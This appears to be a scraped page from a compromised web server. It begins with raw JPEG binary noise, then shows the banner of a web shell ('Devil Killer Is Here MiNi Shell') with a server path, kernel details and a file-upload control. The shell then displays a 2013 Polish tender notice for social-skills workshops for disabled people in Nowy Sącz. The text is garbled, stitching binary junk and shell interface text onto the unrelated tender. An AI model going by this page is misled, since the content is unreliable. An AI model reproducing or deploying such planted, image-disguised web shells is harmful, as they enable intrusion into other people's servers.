JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130814/162299-N-2013.html

<p class="kh_header"><b>Nowy Sącz: Organizacja, obsługa techniczno-logistyczna i przeprowadzenie, w trybie grupowym, stacjonarnych zajęć treningu kompetencji i umiejętności społecznych, warsztatów,szkolenia, uwierz w siebie oraz treningu kompetencji życiowych dla uczestników projektu pn. W stronę samodzielności i niezależności realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 162299 - 2013; data zamieszczenia: 14.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Kilińskiego 72A, 33-300 Nowy Sącz, woj. małopolskie, tel. 0-18 4438251, faks 0-18 4442717.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr-ns.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja, obsługa techniczno-logistyczna i przeprowadzenie, w trybie grupowym, stacjonarnych zajęć treningu kompetencji i umiejętności społecznych, warsztatów,szkolenia, uwierz w siebie oraz treningu kompetencji życiowych dla uczestników projektu pn. W stronę samodzielności i niezależności realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1: Stacjonarny trening kompetencji i umiejętności społecznych  dla osób niepełnosprawnych. 
1.Liczba osób: 15. 
Stopień niepełnosprawności: od lekkiego do znacznego; różne rodzaje niepełnosprawności, umożliwiające samodzielny udział w diagnozie. W przypadku 2 osób przewidywana opieka osób towarzyszących.
2.Program zajęć ma obejmować: 24 godzin lekcyjnych (1godzina = 45 min.).
3.Liczba grup: 2
a)Grupa 1.1: 10 osób,
b)Grupa 1.2:. 5 osób.
4.Harmonogram zajęć 
a)Grupa 1.1:
Dni robocze (od poniedziałku do piątku)
9.00-10.30 (2h)
Przerwa kawowa 15 min.
10.45-12.15 (2h)
Przerwa obiadowa 30 min.
12.45-14.15 (2h)
b) Grupa 1.2:
Dni robocze (od poniedziałku do piątku)
15.30-17.00 (2h)
Przerwa kawowa 15 min.
17.15-18.45 (2h)
Sobota
9.00-10.30 (2h)
Przerwa kawowa
10.45-12.15 (2h) 
5.Miejsce realizacji: Nowy Sącz - bezpłatnie udostępnione dwie sale w siedzibie  PCPR w Nowym Sączu w dni robocze od poniedziałku do piątku w godzinach od 8.00 do 19.00. lub inna sala szkoleniowa na terenie miasta Nowy Sącz.
6.Termin realizacji: do 31 październik 2013 r. 
7.Zakres zadania: 
a)Założenia szkolenia:
celem szkolenia, jest budowanie i rozwijanie umiejętności interpersonalnych w życiu osobistym i zawodowym oraz dostarczenie wiedzy i umiejętności w zakresie m.inn.: komunikacji interpersonalnej, asertywności, powstawania i rozwiązywania konfliktów, radzenia sobie z trudnymi sytuacjami;
b)Zakres tematyczny szkolenia:
Blok 1 - Komunikacja intrapersonalna
a)Podstawowe informacje, cechy dobrej komunikacji, zakłócenia
b)Jak nawiązywać kontakt z drugą osobą?
c)Na co zwracać uwagę z drugim człowiekiem
d)Komunikacja w miejscach publicznych
e)Komunikacja w rodzinie
Blok 2 - Asertywność
a)Podstawowe informacje, najważniejsze elementy
b)Co pomaga a co przeszkadza być asertywnym
c)Praktyczne zajęcia asertywności
Blok 3 - Powstawanie i rozwiązywanie konfliktów
a)Podstawowe informacje, powody powstawania konfliktów
b)Skuteczne metody rozwiązywania konfliktów
c)Trening wyrażania negatywnych emocji
d)Praktyczne wykorzystanie wiedzy - inscenizacje i scenki
Blok 4 - Radzenie sobie z trudnymi sytuacjami
a)Podstawowe informacje
b)Jak skutecznie radzić sobie z trudnymi sytuacjami?
c)Konstruktywne krytykowanie
d)Trening wyrażania pozytywnych emocji
Blok 5 - Siła pozytywnego myślenia
a)Podstawowe informacje
b)Znaczenie i siła naszych słów i myśli
c)Siła pozytywów
d)Jak zmienić styl i sposób myślenia
c)Metody szkoleniowe: 
prezentacje, mini-wykłady, dyskusje, ćwiczenia indywidualne, ćwiczenia grupowe, symulacje, inscenizacje, odgrywanie ról.
WYMAGANIA OGÓLNE DO ZADANIA:
1.W przypadku gdy czas trwania zajęć, przekracza 5 h (1 godzina = 45 minut), Wykonawca zapewnia uczestnikom oraz opiekunom dwudaniowy obiad zupa (300 ml), Drugie danie mięsne: kotlet, kurczak itp. (100 gr) + ziemniaki, ryż, makaron lub kasza itp. (200 gr) + surówka (100 gr) LUB Drugie danie bezmięsne: naleśniki, pierogi, placki itp. (300 gr). Wykonawca przedstawi Zamawiającemu Menu (do akceptacji i zatwierdzenia) w terminie 5 dni roboczych przed rozpoczęciem pierwszych zajęć.
2.Wykonawca jest zobowiązany do zapewnienia ciepłego posiłku w formie obiadu dla każdego uczestnika szkolenia oraz opiekunów zupa (300ml), Drugie danie mięsne: kotlet, kurczak itp. (100 gr) + ziemniaki, ryż, makaron lub kasza itp. (200 gr) + surówka (100 gr) LUB Drugie danie bezmięsne: naleśniki, pierogi, placki itp. (300 gr), jak również dodatkowo serwisu kawowego z poczęstunkiem (drobne ciasteczka (typu Pieguski, paluszki, na jedno spotkanie), woda mineralna (0,5 l typu Piwniczanka; gazowana i niegazowana - 2 szt. na osobę), kawa (typu Nescafe - bez ograniczeń), herbata (typu Lipton - bez ograniczeń), cukier (wg. potrzeb), śmietanka do kawy (typu Łaciate - min. 2 szt.). 
3.Wykonawca jest zobowiązany do dostosowania na czas realizacji zadania sali szkoleniowej udostępnionej przez Zamawiającego na terenie siedziby Powiatowego Centrum Pomocy Rodzinie w Nowym Sączu w zakresie wyposażenia (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart).
4.Wykonawca zapewni zwrot uczestnikom oraz opiekunom kosztów dojazdu z i do miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie zajęć i z powrotem wg. poniższych tabel:
Grupa 1.1
L.p.	Miejsce zamieszkania	Liczba osób
1.Ptaszkowa	1 + op.
2.Piwniczna Zdrój-Zapotok	1
3.Krynica Zdrój	1
4.Stary Sącz-Łazy Biegonickie	1
5.Mogilno-Koniuszowa	1
6.Piwniczna Zdrój	1 + op.
7.Łososina Dolna-Żbikowice	1
8.Stary Sącz-Myślec 	1
9.Obidza-Jazowsko	1
10.Florynka-Binczarowa	1
Grupa 1.2
L.p.Miejsce zamieszkania	Liczba osób
1.Kamionka Wielka-Mszalnica	1
2.Podegrodzie-Olszanka	1
3.Rytro	1
4.Rożnów	1
5.Chełmiec-Świniarsko	1
Zadanie 2: Stacjonarne warsztaty  szkolenie uwierz w siebie dla osób niepełnosprawnych
1.Liczba osób: 27. 
Stopień niepełnosprawności: od lekkiego do znacznego; różne rodzaje niepełnosprawności, umożliwiające samodzielny udział w diagnozie. W przypadku 1 osoby przewidywana opieka osoby towarzyszącej; 1 osoba - na wózku inwalidzkim.
2.Program zajęć ma obejmować: 18 godzin lekcyjnych (1godzina = 45 min.).
3.Liczba grup: 3
a)Grupa 2.1  - 10  osób,
b)Grupa 2.2  - 11 osób,
c)Grupa 3.2  - 6 osób. 
4.Harmonogram zajęć 
a)Grupa 2.1
Dni robocze 
9.00-10.30 (2h)
Przerwa kawowa 15 min.
10.45-12.15 (2h)
Przerwa obiadowa 30 min.
12.45-14.15 (2h)
b)Grupa 2.2
Dni robocze 
9.00-10.30 (2h)
Przerwa kawowa 15 min.
10.45-12.15 (2h)
Przerwa obiadowa 30 min.
12.45-14.15 (2h)
b) Grupa 2.3
Dni robocze 
15.30-17.00 (2h)
Przerwa kawowa 15 min.
17.15-18.45 (2h)
Sobota
9.00-10.30 (2h)
Przerwa kawowa
10.45-12.15 (2h) 
5.Miejsce realizacji: Nowy Sącz - bezpłatnie udostępnione dwie sale w siedzibie  PCPR w Nowym Sączu w dni robocze od poniedziałku do piątku w godzinach od 8.00 do 19.00. lub inna sala szkoleniowa na terenie miasta Nowy Sącz.
6.Termin realizacji: do 31 październik 2013 r. 
7.Zakres zadania: 
a)Założenia szkolenia uwierz w siebie: 
m. inn. analiza mocnych i słabych stron, celów, pozytywnego myślenia, poczucia własnej wartości, autoprezentacja, kreowanie swojego wizerunku
b)Zakres tematyczny szkolenia:
Blok 1 - Mocne i słabe strony
podstawowe informacje
jak się postrzegam
jak mnie postrzegają
techniki wsparcia osobistego
Blok 2 - Cele życiowe
Wyznaczanie celów w ramach życia osobistego, pracy zawodowej, zapoznanie się ze specyfiką celów, korzyściami jakie niosą, warsztaty i ćwiczenia indywidualne pracy z własnymi celami
Moje wartości i zasady przyciągane i odpychane
Moje cele i wartości
Blok 3 - Pozytywne myślenie
Potęga myśli
Stres a pozytywne myślenie
Wizualizacja
Blok 4 - Poczucie własnej wartości
Podstawowe informacje
Filary poczucia własnej wartości
Ja w relacjach międzyludzkich
Autoprezentacja  
Skuteczna komunikacja
Kreowanie własnego wizerunku - mowa ciała, ruch, ubiór
c)Metody szkoleniowe: 
prezentacje, mini-wykłady, dyskusje, ćwiczenia indywidualne, ćwiczenia grupowe, symulacje, inscenizacje, odgrywanie ról.
WYMAGANIA OGÓLNE DO ZADANIA:
1.W przypadku gdy czas trwania zajęć, przekracza 5 h (1 godzina = 45 minut), Wykonawca zapewnia uczestnikom oraz opiekunom dwudaniowy obiad zupa (300ml), Drugie danie mięsne: kotlet, kurczak itp. (100gr) + ziemniaki, ryż, makaron lub kasza itp. (200 gr) + surówka (100 gr) LUB Drugie danie bezmięsne: naleśniki, pierogi, placki itp. (300 gr). Wykonawca przedstawi Zamawiającemu Menu (do akceptacji i zatwierdzenia) w terminie 5 dni roboczych przed rozpoczęciem pierwszych zajęć.
2.Wykonawca jest zobowiązany do zapewnienia ciepłego posiłku w formie obiadu zupa (300 ml), Drugie danie mięsne: kotlet, kurczak itp. (100 gr) + ziemniaki, ryż, makaron lub kasza itp. (200 gr) + surówka (100 gr) LUB Drugie danie bezmięsne: naleśniki, pierogi, placki itp. (300 gr) dla każdego uczestnika szkolenia oraz opiekunów, jak również dodatkowo serwisu kawowego z poczęstunkiem (drobne ciasteczka (typu Pieguski, paluszki, na jedno spotkanie), woda mineralna (0,5 l typu Piwniczanka; gazowana i niegazowana - 2 szt. na osobę), kawa (typu Nescafe - bez ograniczeń), herbata (typu Lipton - bez ograniczeń), cukier (wg. potrzeb), śmietanka do kawy (typu Łaciate - min. 2 szt.). 
3.Wykonawca jest zobowiązany do dostosowania na czas realizacji zadania sali szkoleniowej udostępnionej przez Zamawiającego na terenie siedziby Powiatowego Centrum Pomocy Rodzinie w Nowym Sączu w zakresie wyposażenia (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart).
4.Wykonawca zapewni zwrot uczestnikom oraz opiekunom kosztów dojazdu z i do miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie zajęć i z powrotem wg. poniższych tabel:
Grupa 2.1
L.p.Miejsce zamieszkania	Liczba osób
1.Stary Sącz	2
2.Chełmiec-Trzetrzewina	1
3.Grybów-Siołkowa	1
4.Muszyna	1
5.Gródek n Dunajcem-Przydonica	1
6.Piwniczna Zdrój	1
7.Stróże-Wyskitna	1
8.Chełmiec-Świniarsko 	1
9.Chełmiec-Biczyce Dolne	1
Grupa 2.2
L.p.Miejsce zamieszkania	Liczba osób
1.Januszowa	1
2.Barcice-Przydonica	1
3.Krużlowa Wielka-Stara Wieś	1
4.Podegrodzie-Brzezna	1
5.Tylicz-Muszynka	1
6.Chełmiec-Mała Wieś	1
7.Korzenna-Łęka	1
8.Jazowsko-Obidza 	1
9.Gródek n Dunajcem	1
10.Piwniczna Zdrój	2
Grupa 2.3
L.p.Miejsce zamieszkania	Liczba osób
1.Stary Sącz	3
2.Podegrodzie-Podrzecze	1
3.Chełmiec-Biczyce Górne	1
4.Rożnów-Tropie	1
Zadanie 3: Stacjonarny trening kompetencji życiowych dla osób niepełnosprawnych
1.Liczba osób: 7. 
Stopień niepełnosprawności: od lekkiego do znacznego; różne rodzaje niepełnosprawności, umożliwiające samodzielny udział w diagnozie; grupa wymagająca opieki (min. 1 opiekun); 1 osoba - na wózku inwalidzkim; w przypadku 1 osoby niepełnosprawnej, dojeżdżającej samodzielnie - przewidywana opieka osoby towarzyszącej.
2.Program zajęć ma obejmować: 18 godzin lekcyjnych (1godzina = 45 min.).
3.Liczba grup: 1 - 3.1 (7 osób).
4.Harmonogram zajęć 
Grupa 3.1
Dni robocze 
9.00-10.30 (2h)
Przerwa kawowa 15 min.
10.45-12.15 (2h)
Przerwa obiadowa 30 min.
12.45-14.15 (2h)
5.Miejsce realizacji: Nowy Sącz - bezpłatnie udostępnione dwie sale w siedzibie  PCPR w Nowym Sączu w dni robocze od poniedziałku do piątku w godzinach od 8.00 do 19.00. lub inna sala szkoleniowa na terenie miasta Nowy Sącz.
6.Termin realizacji: do 31 październik 2013 r. 
7.Zakres zadania: 
a)Założenia treningu kompetencji życiowych: 
celem szkolenia jest m.in. przywrócenie uczestnikom samodzielności życiowej, skupienie uwagi na wadze zarządzania własnymi zasobami (np. czasem, budżetem), w realizacji wytyczonych sobie celów, udzielanie informacji o prawach i uprawnieniach.
b)Zakres tematyczny treningu:
Blok 1 - Kompetencje społeczne
- rozumienie sytuacji społecznych, 
- sposoby radzenia sobie ze stresem, 
Blok 2 - Podniesienie kompetencji osobistych
- gospodarowanie własnym czasem, 
- prowadzenie budżetu domowego, 
Blok 3 - Podniesienie kompetencji zawodowych
- wypełnianie podstawowych druków urzędowych i odpowiadanie na pisma urzędowe, 
- uzyskanie wiadomości dotyczących praw i uprawnień Uczestników Projektu.
c)Metody szkoleniowe: 
prezentacje, mini-wykłady, dyskusje, ćwiczenia indywidualne, ćwiczenia grupowe, symulacje, inscenizacje, odgrywanie ról.
WYMAGANIA OGÓLNE DO ZADANIA:
1.W przypadku gdy czas trwania zajęć, przekracza 5 h (1 godzina = 45 minut), Wykonawca zapewnia uczestnikom oraz opiekunom dwudaniowy obiad zupa (300ml), Drugie danie mięsne: kotlet, kurczak itp. (100gr) + ziemniaki, ryż, makaron lub kasza itp. (200 gr) + surówka (100 gr) LUB Drugie danie bezmięsne: naleśniki, pierogi, placki itp. (300 gr). Wykonawca przedstawi Zamawiającemu Menu (do akceptacji i zatwierdzenia) w terminie 5 dni roboczych przed rozpoczęciem pierwszych zajęć.
2.Wykonawca jest zobowiązany do zapewnienia ciepłego posiłku w formie obiadu zupa (300 ml), Drugie danie mięsne: kotlet, kurczak itp. (100 gr) + ziemniaki, ryż, makaron lub kasza itp. (200 gr) + surówka (100 gr) LUB Drugie danie bezmięsne: naleśniki, pierogi, placki itp. (300 gr) dla każdego uczestnika szkolenia oraz opiekunów, jak również dodatkowo serwisu kawowego z poczęstunkiem (drobne ciasteczka (typu Pieguski, paluszki, na jedno spotkanie), woda mineralna (0,5 l typu Piwniczanka; gazowana i niegazowana - 2 szt. na osobę), kawa (typu Nescafe - bez ograniczeń), herbata (typu Lipton - bez ograniczeń), cukier (wg. potrzeb), śmietanka do kawy (typu Łaciate - min. 2 szt.). 
3.Wykonawca jest zobowiązany do dostosowania na czas realizacji zadania sali szkoleniowej udostępnionej przez Zamawiającego na terenie siedziby Powiatowego Centrum Pomocy Rodzinie w Nowym Sączu w zakresie wyposażenia (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart).
4.Wykonawca zapewni min. 1 opiekuna dla osób niepełnosprawnych, zarówno na trasie przejazdu jak również podczas zajęć stacjonarnych.
5.Wykonawca zapewni 6 uczestnikom oraz opiekunom dojazd na trasie: Stary Sącz-Cyganowice - Nowy Sącz (Powiat Nowosądecki) na miejsce przeprowadzenie zajęć i z powrotem.
6.Wykonawca zapewni zwrot uczestnikowi oraz opiekunowi kosztów dojazdu z i do miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie zajęć i z powrotem wg. poniższych tabel:
Grupa 3.1
L.p.	Miejsce zamieszkania	Liczba osób
1.Krynica Zdrój	1 + op.
Zadanie 4: Stacjonarne warsztaty szkolenie uwierz w siebie dla wychowanków z placówek opiekuńczo - wychowawczych i rodzin zastępczych
1.Liczba osób: 9.
2.Program zajęć ma obejmować: 18 godzin lekcyjnych (1godzina = 45 min.).
3.Liczba grup: 1 - 4.1 (9 osób).
4.Harmonogram zajęć:
Sierpień:
Dni robocze 
9.00-10.30 (2h)
Przerwa kawowa 15 min.
10.45-12.15 (2h)
Przerwa obiadowa 30 min.
12.45-14.15 (2h)
lub
Wrzesień-Październik:
Dni robocze 
15.30-17.00 (2h)
Przerwa kawowa 15 min.
17.15-18.45 (2h)
Sobota
9.00-10.30 (2h)
Przerwa kawowa
10.45-12.15 (2h) 
5.Miejsce realizacji: Nowy Sącz - bezpłatnie udostępnione dwie sale w siedzibie  PCPR w Nowym Sączu w dni robocze od poniedziałku do piątku w godzinach od 8.00 do 19.00. lub inna sala szkoleniowa na terenie miasta Nowy Sącz.
6.Termin realizacji: do 31 październik 2013 r. 
7.Zakres zadania: 
a)Założenia szkolenia uwierz w siebie: 
m. inn. analiza mocnych i słabych stron, celów, pozytywnego myślenia, poczucia własnej wartości, autoprezentacja, kreowanie swojego wizerunku
b)Zakres tematyczny szkolenia:
Blok 1 - Mocne i słabe strony
podstawowe informacje
jak się postrzegam
jak mnie postrzegają
techniki wsparcia osobistego
Blok 2 - Cele życiowe
Wyznaczanie celów w ramach życia osobistego, pracy zawodowej, zapoznanie się ze specyfiką celów, korzyściami jakie niosą, warsztaty i ćwiczenia indywidualne pracy z własnymi celami
Moje wartości i zasady przyciągane i odpychane
Moje cele i wartości
Blok 3 - Pozytywne myślenie
Potęga myśli
Stres a pozytywne myślenie
Wizualizacja
Blok 4 - Poczucie własnej wartości
Podstawowe informacje
Filary poczucia własnej wartości
Ja w relacjach międzyludzkich
Autoprezentacja  
Skuteczna komunikacja
Kreowanie własnego wizerunku - mowa ciała, ruch, ubiór
c)Metody szkoleniowe: 
prezentacje, mini-wykłady, dyskusje, ćwiczenia indywidualne, ćwiczenia grupowe, symulacje, inscenizacje, odgrywanie ról.
WYMAGANIA OGÓLNE DO ZADANIA:
1.W przypadku gdy czas trwania zajęć, przekracza 5 h (1 godzina = 45 minut), Wykonawca zapewnia uczestnikom dwudaniowy obiad zupa (300ml), Drugie danie mięsne: kotlet, kurczak itp. (100gr) + ziemniaki, ryż, makaron lub kasza itp. (200 gr) + surówka (100 gr) LUB Drugie danie bezmięsne: naleśniki, pierogi, placki itp. (300 gr). Wykonawca przedstawi Zamawiającemu Menu (do akceptacji i zatwierdzenia) w terminie 5 dni roboczych przed rozpoczęciem pierwszych zajęć.
2.Wykonawca jest zobowiązany do zapewnienia ciepłego posiłku w formie obiadu zupa (300ml), Drugie danie mięsne: kotlet, kurczak itp. (100gr) + ziemniaki, ryż, makaron lub kasza itp. (200 gr) + surówka (100 gr) LUB Drugie danie bezmięsne: naleśniki, pierogi, placki itp. (300 gr) dla każdego uczestnika szkolenia, jak również dodatkowo serwisu kawowego z poczęstunkiem (drobne ciasteczka (typu Pieguski, paluszki, na jedno spotkanie), woda mineralna (0,5 l typu Piwniczanka; gazowana i niegazowana - 2 szt. na osobę), kawa (typu Nescafe - bez ograniczeń), herbata (typu Lipton - bez ograniczeń), cukier (wg. potrzeb), śmietanka do kawy (typu Łaciate - min. 2 szt.). 
3.Wykonawca jest zobowiązany do dostosowania na czas realizacji zadania sali szkoleniowej udostępnionej przez Zamawiającego na terenie siedziby Powiatowego Centrum Pomocy Rodzinie w Nowym Sączu w zakresie wyposażenia (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart).
4.Wykonawca zapewni zwrot uczestnikom kosztów dojazdu z i do miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie zajęć i z powrotem wg. poniższych tabel:
Grupa 4.1
L.p.Miejsce zamieszkania	Liczba osób
1.Gostwica 	2
2.Stary Sącz	2
3.Barcice	2
4.Mochnaczka Niżna
(w przypadku zajęć we wrześniu Beneficjenci przebywają w internacie na terenie Nowego Sącza)	2
5.Polna	1
WYMAGANIA OGÓLNE DO WSZYSTKICH ZADAŃ:
1.Wykonawca jest zobowiązany do dostosowania na czas realizacji usługi sali udostępnionej przez Zamawiającego na terenie siedziby Powiatowego Centrum Pomocy Rodzinie w Nowym Sączu. 
2.Miejsce realizacji zamówienia: w dni robocze od poniedziałku do piątku  w siedzibie PCPR. Dzienny wymiar godzinowy zajęć nie może przekroczyć 6 godzin (1 godzina = 45 minut). 
3.Wykonawcy jest zobowiązany do zapewnienia min. 1 trenera z wykształceniem wyższym i uprawnieniami do prowadzenia poradnictwa psychologicznego lub prowadzenia zajęć socjoterapeutycznych na grupę. Posiadającego doświadczenie w prowadzeniu szkoleń lub warsztatów lub treningów z obszaru pomocy i integracji społecznej w tym w zakresie treningów kompetencji społecznych lub psychospołecznych lub życiowych lub podstawowych dla osób niepełnosprawnych; do prowadzenia warsztatów i ćwiczeń w przedmiotowym zakresie.
4.Wykonawca zobowiązany jest dostarczyć harmonogram Zamawiającemu (do akceptacji i zatwierdzenia) w terminie 5 dni roboczych przed rozpoczęciem pierwszych zajęć.
5.Wykonawca zobowiązany jest do prowadzenia dokumentacji odrębnie dla każdego zadania (w tym również fotograficznej): dzienna lista obecności; dziennik zajęć zawierający listę obecności oraz wymiar godzin i tematy zajęć; lista osób, które rozpoczęły zajęcia; lista osób, które ukończyły zajęcia; lista osób, które nie ukończyły zajęć; rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie zajęć i uzyskanie umiejętności; kopie wydanych certyfikatów i zaświadczeń potwierdzających uczestnictwo w zajęciach; potwierdzenie transportu na zajęcia; potwierdzenie zwrotu kosztów dojazdu; lista obecności z potwierdzeniem korzystania z usługi cateringowej oraz obiorem materiałów szkoleniowych; sprawozdanie merytoryczne z realizacji przedmiotu zamówienia, arkusze badań ewaluacyjnych i inne. Dokumenty powinny być opatrzone podpisem osoby prowadzącej oraz wykonawcy. Wzór ww listy Zamawiający udostępni Wykonawcy przed rozpoczęciem zajęć. Wykonawca zobowiązany jest zapewnić bezpieczeństwo osób uczestniczących w szkoleniach, a także warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
6.Wykonawca zobowiązany jest załączyć do oferty: wstępne programy merytoryczne zajęć z uwzględnieniem czasu trwania sporządzone odrębnie dla każdego zadania (grupy) do uzgodnienia i akceptacji zamawiającego przed podpisaniem umowy. Programy szkoleń muszą uwzględniać zakres merytoryczny poszczególnych szkoleń opisany w SIWZ .
